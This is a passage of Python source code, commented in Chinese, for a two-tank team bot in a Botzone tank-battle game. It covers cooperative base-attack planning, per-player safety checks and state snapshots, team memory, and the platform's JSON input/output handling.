continue for enemy in oppBattler.get_enemies_around(): if enemy is tank: raise OUTER_CONTINUE # # 现在说明可以射击 # player.set_status(Status.READY_TO_CUT_THROUGH_MIDLINE) returnActions[player.id] = shootAction player.set_team_decision(shootAction) return returnActions #{ END 'decision/team/cut_through_midline.py' }# #{ BEGIN 'decision/team/cooperative_attack.py' }# class CooperativeAttackTeamDecision(TeamDecisionMaker): """ 团队合作拆家策略 ----------------- 案例 ------------ 1. 5ceacbd0811959055e22139d 需要预判 1 步 -> 5cec07f30df42d28e72de8d8 2. 5ce8db66d2337e01c7ab9fae 需要预判 3 步 -> 5cec1a324742030582fad728 3. 5cec9157641dd10fdcc5f30d 重叠进攻时能够分开射击了 4. 5cec9a19641dd10fdcc5ff9f case 3 的另一种实现,提前找到合作路线 5. 5cec9c10641dd10fdcc60254 case 2 的另一种实现 6. 5cec9d01641dd10fdcc6045a 合作与不合作路线相同,但是选择了合作 7. 5cec9d7f641dd10fdcc60556 8. 5ceca04d641dd10fdcc60aed case 2 的另一种实现,但是路线更短,因为将合作触发条件放宽到非严格过中线! 9. 5ceca0ab641dd10fdcc60bb6 将合作条件放宽到非严格过中线可以触发的合作拆家 10. 5ceca21b641dd10fdcc60d4d 11. 5ceca3c3641dd10fdcc61071 12. 5ceca80d641dd10fdcc617e9 13. 5cecabbd641dd10fdcc61d34 14. 5cecfa94641dd10fdcc69661 触发前提 -------------- 在双方均到达对方基地的前提下,假定双方坦克不会再发生交火。在这种情况下,可以认为找到的 最短路线即为实际可走的、不受敌方影响的最短路线。那么可以进行团队合作,寻找一条两人合作下 距离更加短的进攻路线 实现方法 -------------- 下面给出一种简单的实现方法(只预判一回合,更加复杂的情况尚未能实现) 这个策略中存在主攻队员和辅助队员的角色划分。这个并不能在一开始就得出定论,而是要通过判断。 首先,合作拆家所希望达到的效果是,辅助队员帮助主攻队员清除其路线上的土墙,从而减短主攻队员的 攻击路线长度。每清除掉一个土墙,能够减少的路径长度为 2 因此,首先在 delay = 1 的限制条件下,找到其中一个进攻队员所有可能的最短路线。 delay = 1 是允许的, 因为一个土墙的权重是 2 ,打掉 delay = 1 的路线上的一个土墙,可以得到比 delay = 0 的最短路线更加短的路线。 然后考虑另一个进攻队员当前回合所有可能的攻击行为。找到这些攻击行为下能够摧毁掉的 fields ,如果恰好是 位于另一队员攻击路线上的土墙,那么就找到了一条双人合作下的更短路线。 依照上述方法,可以列举出所有可能的最短路线。对这些路线长度进行排序以找到最短的路线,即为团队合作下更优 的一种拆家路线。 补充的更复杂实现 ----------------- 有的时候会出现两个队友攻击路线相同且刚好互相不会影响 5ce8db66d2337e01c7ab9fae ,这种情况下实际上仍然 有机会产生团队合作,但是需要预判 3 步,第一步首先考虑所有可能的进攻行为,第二步按照正常的进攻方向,第三步 再尝试寻找团队更优路线,如果此时可以找到团队合作路线,那么当前回合就先采用第一步的进攻行为。第二步照常进攻 到了第三步的时候就会被上面那种单回合的合作拆家决策找到合作路线。 特判情况 ----------- 1. 
考虑这样一种情况,当前两个队友进攻路线长度相同,两者下一步同时攻击一个块,假如让其中一个坦克停止攻击 在下回合可以得到更加短的进攻路线,那么就让这个队员暂时停下来。这种情况通常对应着最后拆基地的几步,一个队员 暂时停下来,让另一个队员拆到前面的墙,然后他下回合马上可以打掉基地,最短路线长度是 2 , 如果双方此时是同时开火的,那么最短路线长度是 3 2. 假设一个队友这回合打掉墙,另一个队友下回合可以到达这个队友身后,下回合前面的队友闪避,后面的队友射击, 那么最短路线长度是 2 ,如果此时前一个队员等待一回合,后面的队员将无法射击,那么最短路线长度将是 3 """ IS_MIDDLE_FIRST = True # 优先中路搜索 IS_X_AXIS_FIRST = True # 优先 x-轴优先搜索 def _find_cooperative_solution(self, attackingPlayer, assistantPlayer): """ 给定 attackingPlayer 和 assistantPlayer ,尝试寻找一种最短的进攻路线 如果有个可行的方案,那么只返回找到的第一个 Return: - solution (attackingPlayer, route, realAction, assistantPlayer, shootAction) / None """ team = self._team map_ = team._map oppBase = map_.bases[1 - team.side] IS_MIDDLE_FIRST = self.__class__.IS_MIDDLE_FIRST IS_X_AXIS_FIRST = self.__class__.IS_X_AXIS_FIRST attackingBattler = attackingPlayer.battler assistantBattler = assistantPlayer.battler for route in attackingBattler.get_all_shortest_attacking_routes(delay=1, middle_first=IS_MIDDLE_FIRST, x_axis_first=IS_X_AXIS_FIRST): for shootAction in assistantBattler.get_all_valid_shoot_actions(): destroyedFields = assistantBattler.get_destroyed_fields_if_shoot(shootAction) if len(destroyedFields) == 1: field = destroyedFields[0] if isinstance(field, BrickField) and field.xy in route: # 拆到了一个队友进攻路线上的土墙 # # 首先考虑打掉的是不是同一个块 # # 打掉同一个块的情况下,当且仅当攻击方已经面向对方基地时有效,否则起不到增加长度的效果 # attackAction = attackingBattler.get_next_attacking_action(route) if Action.is_shoot(attackAction): destroyedFields2 = attackingBattler.get_destroyed_fields_if_shoot(attackAction) if len(destroyedFields2) == 1 and destroyedFields2[0] is field: # 打掉的是同一个块 if not attackingBattler.on_the_same_line_with(oppBase, ignore_brick=True): continue # 只有当攻击方面对对方基地时,才能起到减少路线长度的效果 else: # 否则可以让攻击方这回合等待 realAction = Action.STAY return (attackingPlayer, route, realAction, assistantPlayer, shootAction) realAction = attackingPlayer.try_make_decision(attackAction) if not Action.is_stay(realAction): return (attackingPlayer, route, realAction, assistantPlayer, shootAction) # 
找不到,返回 None return None def _make_decision(self): team = self._team map_ = team._map oppBase = map_.bases[1 - team.side] player1, player2 = team.players returnActions = [ player.get_current_decision() for player in team.players ] if player1.defeated or player2.defeated: # 不是两个人就不需要考虑合作了 return returnActions elif ( not player1.battler.is_in_enemy_site(include_midline=True) or not player2.battler.is_in_enemy_site(include_midline=True) ): # 两者必须同时在对方基地,并且是严格的不包含中线 # # 条件放宽了,现在允许包含中线 5cec9e9d641dd10fdcc60783 # return returnActions elif ( player1.has_status(Status.ENCOUNT_ENEMY) or player2.has_status(Status.ENCOUNT_ENEMY) or player1.has_status(Status.WAIT_FOR_MARCHING) or player2.has_status(Status.WAIT_FOR_MARCHING) or player1.has_status(Status.PREVENT_BEING_KILLED) or player2.has_status(Status.PREVENT_BEING_KILLED) ): # 不可以拥有和敌人遭遇战斗相关的状态 return returnActions IS_MIDDLE_FIRST = self.__class__.IS_MIDDLE_FIRST IS_X_AXIS_FIRST = self.__class__.IS_X_AXIS_FIRST # # 不需要判断是否具有团队信号? # # 事实上他碰巧提供了一个很好的案例 5cec9157641dd10fdcc5f30d # 最后一步的时候由于覆盖了 READY_TO_LEAVE_TEAMMATE 的团队策略,使得最后一步合作得以顺利实现! # solutions = [] # -> [ (attackingPlayer, route, realAction, assistantPlayer, shootAction) ] for attackingPlayer, assistantPlayer in [ (player1, player2), (player2, player1) ]: attackingBattler = attackingPlayer.battler assistantBattler = assistantPlayer.battler if not assistantBattler.canShoot: # 当前回合不能进攻,那就无法发起协助了 ... 
continue _route1 = attackingBattler.get_shortest_attacking_route() _route2 = assistantBattler.get_shortest_attacking_route() minRouteLength = min(_route1.length, _route2.length) # # 攻击方进攻路线长度比辅助方长 2 步以上,那么直接跳过 #-------------------------------------------------------- # 因为单回合决策下至多可以让一个队员的路线长度减 2,如果进攻方比辅助方的攻击路线长 2 步以上,那么 # 一回合内无论如何都不可能让进攻方的路线长度短于辅助方当前回合的最短路线长度,在这种情况下即使可以 # 发生合作,也是没有意义的,甚至可能拖延辅助方的进攻节奏(但是并不能排除可以多回合帮助,然而这个情况 # 非常复杂,所以在此不考虑了) # if _route1.length - _route2.length >= 2: continue solution = self._find_cooperative_solution(attackingPlayer, assistantPlayer) if solution is not None: solutions.append(solution) with map_.auto_revert() as counter: # # 现在往后模拟两回合 5ce8db66d2337e01c7ab9fae # # 第一步随便攻击,第二步按照正常的攻击方向,第三步看是否有合适的攻击路线 # _cachedActions = set() # 缓存已经尝试过的第一步两个方向 for route1 in attackingBattler.get_all_shortest_attacking_routes(delay=1, middle_first=IS_MIDDLE_FIRST, x_axis_first=IS_X_AXIS_FIRST): # 攻击方第一步允许 delay = 1 action1 = attackingBattler.get_next_attacking_action(route1) realAction1 = attackingPlayer.try_make_decision(action1) if Action.is_stay(realAction1): continue for route2 in assistantBattler.get_all_shortest_attacking_routes(middle_first=IS_MIDDLE_FIRST, x_axis_first=IS_X_AXIS_FIRST): action2 = assistantBattler.get_next_attacking_action(route2) realAction2 = assistantPlayer.try_make_decision(action2) if Action.is_stay(realAction2): continue key = (action1, action2) if key in _cachedActions: continue _cachedActions.add(key) with map_.auto_revert() as counter: ## 模拟两步 ## map_.multi_simulate((attackingBattler, action1), (assistantBattler, action2)) counter.increase() # 模拟两步找到路线 solution = self._find_cooperative_solution(attackingPlayer, assistantPlayer) if solution is not None: solutions.append( (attackingPlayer, route1, action1, assistantPlayer, action2) ) continue ## 模拟三步 ## action11 = attackingBattler.get_next_attacking_action() action22 = assistantBattler.get_next_attacking_action() map_.multi_simulate((attackingBattler, action11), 
                                                (assistantBattler, action22))
                            counter.increase()

                            # find a cooperative route after simulating three steps ahead
                            solution = self._find_cooperative_solution(attackingPlayer, assistantPlayer)
                            if solution is not None:
                                solutions.append( (attackingPlayer, route1, action1, assistantPlayer, action2) )
                                continue

        if len(solutions) > 0:
            solutions.sort(key=lambda tup: tup[1].length)
            for attackingPlayer, route, realAction, assistantPlayer, shootAction in solutions:
                attackingBattler = attackingPlayer.battler
                assistantBattler = assistantPlayer.battler
                returnActions[attackingBattler.id] = realAction
                returnActions[assistantBattler.id] = shootAction
                attackingPlayer.set_current_attacking_route(route)
                attackingPlayer.set_current_decision(realAction)
                attackingPlayer.set_team_decision(realAction)
                assistantPlayer.set_current_decision(shootAction)
                assistantPlayer.set_team_decision(shootAction)
                assistantPlayer.set_status(Status.HELP_TEAMMATE_ATTACK)
                break

        return returnActions

#{ END 'decision/team/cooperative_attack.py' }#



#{ BEGIN 'decision/team/dummy_ending.py' }#

class TeamDecisionDummyEnding(TeamDecisionMaker):
    """
    Terminator placed at the end of the DecisionChain.
    """
    def is_handled(self, result):
        """
        Always returns True, so the DecisionChain stops here.
        """
        return True

    def make_decision(self):
        """
        Return the results already cached on the players, unchanged.
        """
        team = self._team
        player1, player2 = team.players
        action1 = player1.get_current_decision()
        action2 = player2.get_current_decision()
        return [ action1, action2 ]

#{ END 'decision/team/dummy_ending.py' }#



#{ BEGIN 'player.py' }#

class Player(DecisionMaker):

    # Unhandled cases return Action.INVALID
    #------------------------------------
    # Note that since a Player is only judged by its team, the signal is used
    # purely for player/team communication. The team therefore ignores the
    # signal when judging, even though the player actually returns the pair
    # (action, signal)
    #
    UNHANDLED_RESULT = Action.INVALID

    def __init__(self, *args, **kwargs):
        if __class__ is self.__class__:
            raise NotImplementedError


class Tank2Player(Player):

    _instances = {} # { (side, id): instance }

    def __new__(cls, tank, map=None, **kwargs):
        """
        Cache created player instances keyed by (side, id), making each a
        singleton.

        Input:
            - tank    TankField/BattleTank   must be a TankField on first creation; anything after that
            - map
Tank2Map """ key = (tank.side, tank.id) # 只要有这两个属性就可以 obj = __class__._instances.get(key) if obj is None: map_ = map if map_ is None: raise ValueError("map is required at first initialization") if not isinstance(tank, TankField): raise TypeError("tank must be a TankField object at first initialization") obj = object.__new__(cls, **kwargs) __class__._instances[key] = obj obj._initialize(tank, map_) # 使用自定义初始化条件初始化 return obj def __init__(self, tank, map=None): pass def _initialize(self, tank, map): self._tank = tank self._map = map self._battler = BattleTank(tank, map) self._team = None # Tank2Team self._teammate = None # Tank2Player self._opponents = None # [Tank2Player, Tank2Player] self._status = set() # 当前回合的状态,可以有多个,每回合情况 self._labels = set() # 对手给我做的标记,标记后长期有效 self._riskyEnemy = None # 缓存引起潜在风险的敌人 BattleTank self._currentRoute = None # 缓存这回合的攻击路线。这个属性加入较早,只缓存了 marching 逻辑下的路线 self._currentDecision = None # 缓存决策结果,注:每调用一次 make_decision 就会自动修改一次这个结果 self._teamDecision = None # 缓存团队策略 class _SnapshotManager(object): """ 用于管理 player 还原点的创建、选择回滚等行为 --------------------------------------------- 可以为 player 在决策过程中产生的临时变量创建快照,如果在此后又进行了重新决策,但是又不想让这个 决策修改之前决策时留下的临时变量,那么就可以在新的决策前先通过这个类创建一个快照,结束后再通过快照 进行回滚。 关于还原点的创建 ---------------- 1. 对于可能被修改地址指向内存的属性,需要创建一个深拷贝,例如 set, list 类型的属性 2. 对于只是储存引用的属性,那么此处只需要复制引用。这对于采用单例模式设计的类的实例来说是必须的 3. 
对于不可变对象,只需进行简单的值复制 """ MUTABLE_ATTRIBUTES = ( "_status", "_labels" ) IMMUTABLE_ATTRIBUTES = ( "_currentDecision", "_teamDecision" ) REFERENCE_ATTRIBUTES = ( "_currentRoute", "_riskyEnemy" ) TEMPORARY_ATTRIBUTES = MUTABLE_ATTRIBUTES + IMMUTABLE_ATTRIBUTES + REFERENCE_ATTRIBUTES def __init__(self): self._snapshot = None self._discarded = False # 是否废弃当前快照,让 player 的状态永久改变 def create_snapshot(self): """ 创建一个快照 由于决策时可能还会更改敌人的状态,所以实际上是给所有人创建快照 """ snapshot = self._snapshot = {} # (side, id) -> attributes for _key, player in Tank2Player._instances.items(): cache = snapshot[_key] = {} for attr, value in player.__dict__.items(): if attr in self.__class__.MUTABLE_ATTRIBUTES: cache[attr] = deepcopy(value) # 创建深拷贝 elif attr in self.__class__.IMMUTABLE_ATTRIBUTES: cache[attr] = value # 复制值 elif attr in self.__class__.REFERENCE_ATTRIBUTES: cache[attr] = value # 复制引用 def restore(self): """ 恢复到还原点的状态 """ if self._discarded: # 保存更改的情况下,不再回滚 return snapshot = self._snapshot for _key, player in Tank2Player._instances.items(): cache = snapshot[_key] for attr in self.__class__.TEMPORARY_ATTRIBUTES: player.__dict__[attr] = cache[attr] def discard_snapshot(self): """ 是否丢弃当前 snapshot,保存变更。 之后如果再调用 restrore,将不会当前 snapshot 还原 player 的状态 """ self._discarded = True def __eq__(self, other): return self.side == other.side and self.id == other.id def __repr__(self): return "%s(%d, %d, %d, %d)" % ( self.__class__.__name__, self.side, self.id, self._tank.x, self._tank.y) def __copy__(self): return self def __deepcopy__(self): # singleton ! 
return self @property def side(self): return self._tank.side @property def id(self): return self._tank.id @property def defeated(self): return self._tank.destroyed @property def tank(self): return self._tank @property def battler(self): return self._battler @property def team(self): return self._team @property def teammate(self): # -> Tank2Player return self._teammate @property def opponents(self): # -> [Tank2Player, Tank2Player] return self._opponents @contextmanager def create_snapshot(self): """ 创建一个还原点,然后该 player 进行决策,决策完成后回滚 """ try: manager = self.__class__._SnapshotManager() manager.create_snapshot() yield manager # 可以选择不接 snapshot except Exception as e: raise e finally: manager.restore() def set_team(self, team): self._team = team def set_teammate(self, player): # -> Tank2Player assert isinstance(player, Tank2Player) and player.side == self.side self._teammate = player def set_opponents(self, opponents): # -> [Tank2Player] for player in opponents: assert isinstance(player, Tank2Player) and player.side != self.side self._opponents = opponents def get_risky_enemy(self): """ 引起预期行为被拒的敌人,因为该敌人有可能在我方采用预期行为的下一回合将我方击杀 """ return self._riskyEnemy # -> BattleTank def set_risky_enemy(self, enemy): self._riskyEnemy = BattleTank(enemy) # 确保为 BattleTank 对象 def get_current_decision(self): # 返回最后一次决策的结果,用于队员间交流 return self._currentDecision def set_current_decision(self, action): # 用于团队设置队员的当前决策 self._currentDecision = action def get_team_decision(self): # 获得当前的团队决策 return self._teamDecision def has_team_decision(self): return ( self._teamDecision is not None ) def set_team_decision(self, action): # 用于团队设置队员的团队决策 self._teamDecision = action def get_current_attacking_route(self): return self._currentRoute def set_current_attacking_route(self, route): self._currentRoute = route def get_status(self): return self._status def set_status(self, *status): # 添加一个或多个状态 for _status in status: self._status.add(_status) def remove_status(self, *status): # 删除一个或多个状态 for _status in 
status: self._status.discard(_status) # remove_if_exists def clear_status(self): # 清除所有状态 self._status.clear() def has_status(self, status): # 是否存在某种状态 return status in self._status def get_labels(self): return self._labels def add_labels(self, *labels): # 添加一个或多个标记 for label in labels: self._labels.add(label) def has_label(self, label): # 是否存在某个标记 return label in self._labels def remove_labels(self, *labels): # 删除一个活多个标记 for label in labels: self._labels.discard(label) def clear_labels(self): # 清楚全部标记 self._labels.clear() def has_status_in_previous_turns(self, status, turns=1): return self._team.has_status_in_previous_turns(self, status, turns=turns) def has_status_recently(self, status, turns): return self._team.has_status_recently(self, status, turns) def get_previous_action(self, back=1): return self._team.get_previous_action(self, back) def get_previous_attacking_route(self): return self._team.get_previous_attcking_route(self) def _is_safe_action(self, action): """ 评估该这个决策是否安全 Return: - issafe bool 安全 """ tank = self._tank map_ = self._map battler = self._battler teammate = map_.tanks[tank.side][1 - tank.id] if not map_.is_valid_action(tank, action): # 先检查是否为有效行为 return False if Action.is_stay(action): return True # 移动情况下有一种可能的风险 #-------------------------- # 1. 需要考虑移动后恰好被对方打中 # 2. 移动后恰好遇到两个敌人,假设当前回合敌人不动 # ------------------------- if Action.is_move(action): oppBattlers = [ _player.battler for _player in self._opponents ] riskFreeOpps = [] for oppBattler in oppBattlers: if not oppBattler.canShoot: # 对手本回合无法射击,则不必担心 riskFreeOpps.append(oppBattler) with map_.simulate_one_action(tank, action): # 提交地图模拟情况 if len( battler.get_enemies_around() ) > 1: # 移动后遇到两个敌人 battler1, battler2 = oppBattlers x1, y1 = battler1.xy x2, y2 = battler2.xy if x1 != x2 and y1 != y2: # 并且两个敌人不在同一直线上 self.set_risky_enemy(battler1) # 随便设置一个? 
return False for oppBattler in oppBattlers: if oppBattler.destroyed: continue elif oppBattler in riskFreeOpps: continue for enemy in oppBattler.get_enemies_around(): if enemy is tank: # 移动后可能会被敌人打中 self.set_risky_enemy(oppBattler) return False # 射击情况下有两种可能的危险 #-------------------------- # 1. 打破一堵墙,然后敌人在后面等着 # 注意区分两个敌人的情况! 5ce92ed6d2337e01c7abf544 # 2. 身边没有闪避的机会,打破一堵墙,对方刚好从旁路闪出来 # 3. 打到队友! 5ce90c6dd2337e01c7abce7a #--------------------------- if Action.is_shoot(action): destroyedFields = battler.get_destroyed_fields_if_shoot(action) if not teammate.destroyed and teammate in destroyedFields: return False # 打到队友当然不安全! with map_.simulate_one_action(battler, action): # 模拟本方行为 # # TODO: # 只模拟一个坦克的行为并不能反映真实的世界,因为敌方这回合很有可能射击 # 那么下回合它就无法射击,就不应该造成威胁 # for oppTank in map_.tanks[1 - tank.side]: if oppTank.destroyed: continue oppBattler = BattleTank(oppTank) for oppAction in oppBattler.get_all_valid_move_actions(): # 任意移动行为 with map_.simulate_one_action(oppBattler, oppAction): # 模拟敌方行为 for field in destroyedFields: if field.xy == oppTank.xy: break # 对方下一步不可能移动到我即将摧毁的 field 上,所以这种情况是安全的 else: for enemy in oppBattler.get_enemies_around(): if enemy is tank: # 敌方原地不动或移动一步后,能够看到该坦克 # 还可以尝试回避 actions = battler.try_dodge(oppBattler) if len(actions) == 0: # 无法回避,危险行为 self.set_risky_enemy(oppBattler) return False return True # 默认安全? def try_make_decision(self, action, instead=Action.STAY): """ 用这个函数提交决策 如果这个决策被判定是危险的,那么将提交 instead 行为 """ if not Action.is_valid(action): return instead elif not self._is_safe_action(action): return instead else: return action def is_safe_to_close_to_this_enemy(self, oppBattler): """ 下回合接近某个敌人是否安全? 
--------------------------- 用于双方相遇 (且敌人无法射击),我方试图接近他的时候 这种情况下需要判断周围是否有敌人攻击我 """ tank = self._tank map_ = self._map battler = self._battler if oppBattler.canShoot: # 可以射击,必定不安全,还是检查一下 return False action = battler.move_to(oppBattler) if map_.is_valid_move_action(tank, action): for _oppBattler in [ _player.battler for _player in self._opponents ]: # 找到另一个敌人 if _oppBattler.destroyed: # 输了就不算 continue if _oppBattler is oppBattler: # 排除目前这个敌人 continue if not _oppBattler.canShoot: # 本回合不能攻击的不算 continue # 开始模拟,反正就一架坦克 with map_.simulate_one_action(tank, action): for enemy in _oppBattler.get_enemies_around(): if enemy is tank: # 我方坦克将出现在它旁边,并且它可以射击 self.set_risky_enemy(_oppBattler) return False # 可能被偷袭 else: # 此处判断不会被偷袭 return True else: return False # 不能移动,当然不安全 ... def is_safe_to_break_overlap_by_move(self, action, oppBattler): """ 在不考虑和自己重叠的敌人的情况下,判断采用移动的方法打破重叠是否安全 此时将敌人视为不会攻击,然后考虑另一个敌人的攻击 """ tank = self._tank map_ = self._map battler = self._battler if not map_.is_valid_move_action(tank, action): # 还是检查一下,不要出错 return False # 如果移动后有两个敌人在旁边,那么不能前进 5cd3e7a786d50d05a0082a5d #------------------------------------------- with map_.simulate_one_action(tank, action): if len(battler.get_enemies_around()) > 1: #self._riskyEnemy = ?? return False _oppBattlers = [ _player.battler for _player in self._opponents ] for _oppBattler in _oppBattlers: if _oppBattler.destroyed: # 跳过已经输了的 continue if not _oppBattler.canShoot: # 另一个对手不能射击 continue if _oppBattler is oppBattler: # 不考虑和自己重叠的这个坦克 continue with map_.simulate_one_action(tank, action): # 提交模拟 for enemy in _oppBattler.get_enemies_around(): if enemy is tank: # 不安全,可能有风险 self.set_risky_enemy(_oppBattler) return False else: return True # 否则是安全的 def is_suitable_to_overlap_with_enemy(self, oppBattler): """ 当两者均没有炮弹,然后中间相差一格时,冲上去和敌方坦克重叠是否合适? WARNING: ------------ 1. 该函数仅适用于两者间移动路劲长度为 2 的情况,其他情况不适用 2. 
该函数判定为 False 的情况,表示适合堵路,不适合重叠,但是判定为 False 并不表示一定要冲上去重叠,而是要根据当时的具体情况来判断 """ tank = self._tank map_ = self._map battler = self._battler _route = battler.get_route_to_enemy_by_move(oppBattler) assert _route.length == 2 action = oppBattler.move_to(battler) if map_.is_valid_move_action(oppBattler, action): # # 检查自己所处的位置是否是敌人必经之路 # 如果是,那么就堵路 # originRoute = oppBattler.get_shortest_attacking_route() blockingRoute = oppBattler.get_shortest_attacking_route( # 将我方坦克设为 Steel ignore_enemies=False, bypass_enemies=True) if originRoute.is_not_found(): # 不大可能,但是检查一下 return False if blockingRoute.is_not_found(): # 直接就走不通了,当然非常好啦 return False if blockingRoute.length - originRoute.length > 1: # 认为需要多打破一个以上土墙的情况叫做原路 return False return True # @override def make_decision(self, signal=Signal.NONE): """ 预处理: ------------------ - 清除所有旧有状态 - 清除可能的风险敌人 - 统一处理回复格式 注意: ------------------ - 申明为 _make_decision 过程中的缓存变量,必须在下一次决策前预先清除 """ self.clear_status() # 先清除所有的状态 self._riskyEnemy = None # 清楚所有缓存的风险敌人 res = self._make_decision(signal) if isinstance(res, (tuple, list)) and len(res) == 2: returnSignal = res[1] action = res[0] else: if signal != Signal.NONE: # 说明没有回复团队信号 returnSignal = Signal.UNHANDLED else: returnSignal = Signal.INVALID action = res self._currentDecision = action # 缓存决策 return ( action, returnSignal ) def _make_decision(self, signal): player = self battler = player.battler if player.defeated: player.set_status(Status.DIED) return self.__class__.UNHANDLED_RESULT if not battler.canShoot: player.set_status(Status.RELOADING) if battler.is_face_to_enemy_base(): player.set_status(Status.FACING_TO_ENEMY_BASE) if (not player.has_label(Label.DONT_WITHDRAW) and player.has_label(Label.KEEP_ON_WITHDRAWING) and WithdrawalDecision.ALLOW_WITHDRAWAL ): player.remove_status(Status.AGGRESSIVE, Status.DEFENSIVE, Status.STALEMENT) player.set_status(Status.WITHDRAW) # 先保持着 这个状态 decisions = DecisionChain( LeaveTeammateDecision(player, signal), AttackBaseDecision(player, signal), 
EncountEnemyDecision(player, signal), OverlappingDecision(player, signal), BaseDefenseDecision(player, signal), BehindBrickDecision(player, signal), FollowEnemyBehindBrickDecision(player, signal), WithdrawalDecision(player, signal), ActiveDefenseDecision(player, signal), MarchingDecision(player, signal), ) res = decisions.make_decision() if decisions.is_handled(res): return res return self.__class__.UNHANDLED_RESULT #{ END 'player.py' }# #{ BEGIN 'team.py' }# class Team(DecisionMaker): UNHANDLED_RESULT = [ Action.STAY, Action.STAY ] # 实际上不可能碰到 team 不能决策的情况,否则找谁决策呀 ... def __init__(self, *args, **kwargs): if __class__ is self.__class__: raise NotImplementedError class Tank2Team(Team): def __init__(self, side, player1, player2, map): player1.set_team(self) player2.set_team(self) self._side = side self._map = map self._player1 = player1 self._player2 = player2 self._opponentTeam = None self._memory = {} # 团队记忆 self._previousActions = [] # 历史行为 @property def side(self): return self._side @property def players(self): return [ self._player1, self._player2 ] def load_memory(self, memory): """ botzone 将 data 传入给 team 恢复记忆 """ if memory is None: memory = { "status": [], # [ set(), set() ] 每轮的状态 "labels": [ set(), set() ], # [ set(), set() ] 已有的标记 "previousRoute": [ None, None ] # [ Route, Route ] } self._memory = memory self._player1.add_labels(*memory["labels"][0]) self._player2.add_labels(*memory["labels"][1]) def dump_memory(self): memory = self._memory memory["status"].append([ self._player1.get_status(), self._player2.get_status(), ]) memory["labels"] = [ self._player1.get_labels(), self._player2.get_labels(), ] memory["previousRoute"] = [ self._player1.get_current_attacking_route(), self._player2.get_current_attacking_route(), ] return memory def get_memory(self): return self._memory def set_previous_actions(self, previousActions): """ 由 botzone input 获得的过去动作,可以将其视为一种记忆 """ self._previousActions = previousActions def set_opponent_team(self, team): """ 设置对手团队 Input: - 
team Tank2Team """ assert isinstance(team, self.__class__) self._opponentTeam = team def has_status_in_previous_turns(self, player, status, turns=1): """ 在曾经的一定回合里,某玩家是否拥有某个状态 Input: - player Player 玩家实例,不一定是本队的 - status int 状态编号 - turns int 向前检查多少回合 """ team = player.team memory = team.get_memory() allStatus = memory["status"] if len(allStatus) == 0: return False # TODO: # 还需要判断回合数是否超出一已知回合? for turn in range( len(allStatus) - 1 , len(allStatus) - 1 - turns, -1 ): # 逆序 try: previousStatus = allStatus[turn][player.id] except IndexError: # 可能 allStatus 为空 return False if previousStatus is None: return False elif status not in previousStatus: return False else: return True def has_status_recently(self, player, status, turns): """ 最近的几回合内是否曾经拥有过某个状态 """ team = player.team memory = team.get_memory() allStatus = memory["status"] if len(allStatus) == 0: return False for turn in range( len(allStatus) - 1 , len(allStatus) - 1 - turns, -1 ): try: previousStatus = allStatus[turn][player.id] if status in previousStatus: return True except IndexError: return False else: return False def get_previous_action(self, player, back=1): """ 获得一个玩家的操纵坦克的历史行为 Input: - player Player 玩家实例,不一定是本队的 - back int ( >= 1) 前第几回合的历史记录,例如 back = 1 表示前一回合 """ assert back >= 1, "back >= 1 is required" return self._previousActions[player.id][-back] def get_previous_attcking_route(self, player): return self._memory[player.id] def _make_decision(self): """ 团队决策 Return: - actions [int, int] 0, 1 号玩家的决策 """ team = self # 假装先让对方以自己的想法决策 #------------------------------- # 分析对方的行为,可以对下一步的行为作出指导 # for oppPlayer in self._opponentTeam.players: oppPlayer.make_decision() decisions = DecisionChain( IndividualTeamDecision(team), VitalTeamDecision(team), LeaveTeammateTeamDecision(team), ForcedAttackTeamDecision(team), BreakBrickTeamDecision(team), BackToHelpTeamDecision(team), CutThroughMidlineTeamDecision(team), CooperativeAttackTeamDecision(team), PreventTeamHurtTeamDecision(team), TeamDecisionDummyEnding(team), ) 
res = decisions._make_decision() # for func in [ find_all_routes_for_shoot, find_all_routes_for_move ]: # if not hasattr(func, "__wrapped__"): # continue # _wrapper = func.__wrapped__ # if hasattr(_wrapper, "__memory__"): # _memory = _wrapper.__memory__ # debug_print(_memory.keys(), len(_memory)) # debug_print(sys.getsizeof(_memory)) return res # @override def make_decision(self): """ 如果有的玩家无法决策,那么就将其行为设为 Action.STAY 事实上这种情况是不应该出现的,但是为了防止出错,此处对决策结果进行检查 """ player1 = self._player1 player2 = self._player2 action1, action2 = self._make_decision() if not player1.is_handled(action1): action1 = Action.STAY if not player2.is_handled(action2): action2 = Action.STAY return [ action1, action2 ] #{ END 'team.py' }# #{ BEGIN 'stream.py' }# class BotzoneIstream(object): def read(self): return input() class BotzoneOstream(object): def write(self, data): print(data) #{ END 'stream.py' }# #{ BEGIN 'botzone.py' }# class Botzone(object): def __init__(self, long_running): self._longRunning = long_running self._data = None self._globalData = None self._requests = [] # 对方的决策 self._responses = [] # 己方的决策 @property def data(self): return self._data @property def globalData(self): return self._globalData @property def requests(self): return self._requests @property def responses(self): return self._responses def handle_input(self, stream): """ 解析输入信息 Input: - stream TextIOWrapper 输入流对象,必须实现 read 方法 """ inputJSON = json.loads(stream.read()) self._requests = inputJSON["requests"] self._responses = inputJSON["responses"] self._data = inputJSON.get("data", None) self._globalData = inputJSON.get("globaldata", None) def make_output(self, stream, response, debug, data, globaldata): """ 输出结果 Input: - stream TextIOWrapper 输出流对象,必须实现 write 方法 - response dict Bot 此回合的输出信息 - debug dict/str 调试信息,将被写入log,最大长度为1KB - data dict Bot 此回合的保存信息,将在下回合输入 - globaldata dict Bot 的全局保存信息,将会在下回合输入, 对局结束后也会保留,下次对局可以继续利用 """ stream.write(json.dumps({ "response": response, "debug": debug, "data": data, "globaldata": 
globaldata, })) if not self._longRunning: sys.exit(0) class Tank2Botzone(Botzone, metaclass=SingletonMeta): def __init__(self, map, long_running=False): super().__init__(long_running) self._mySide = -1 self._map = map self._pastActions = { # 由 requests, responses 解析而来的历史动作记录 (side, id_): [] for side in range(SIDE_COUNT) for id_ in range(TANKS_PER_SIDE) } @property def turn(self): return self._map.turn @property def mySide(self): return self._mySide def _parse_field_points(self, binary): """ 解析 requests 中存在有某种类型 field 的坐标 Input: - binary list 某种类型 field 的 binary 标记 Yield: - (x, y) tuple(int, int) 这个坐标上存在该类型 field """ _MAP_WIDTH = self._map.width for i in range(3): mask = 1 for y in range(i * 3, i * 3 + 3): for x in range(_MAP_WIDTH): if binary[i] & mask: yield (x, y) mask <<= 1 def handle_input(self, stream=sys.stdin): super().handle_input(stream) if self._data is not None: self._data = DataSerializer.deserialize(self._data) if self._globalData is not None: try: self._globalData = DataSerializer.deserialize(self._globalData) except Exception as e: self._globalData = None assert len(self._requests) - len(self._responses) == 1 # 带 header header = self._requests.pop(0) # 此时 header 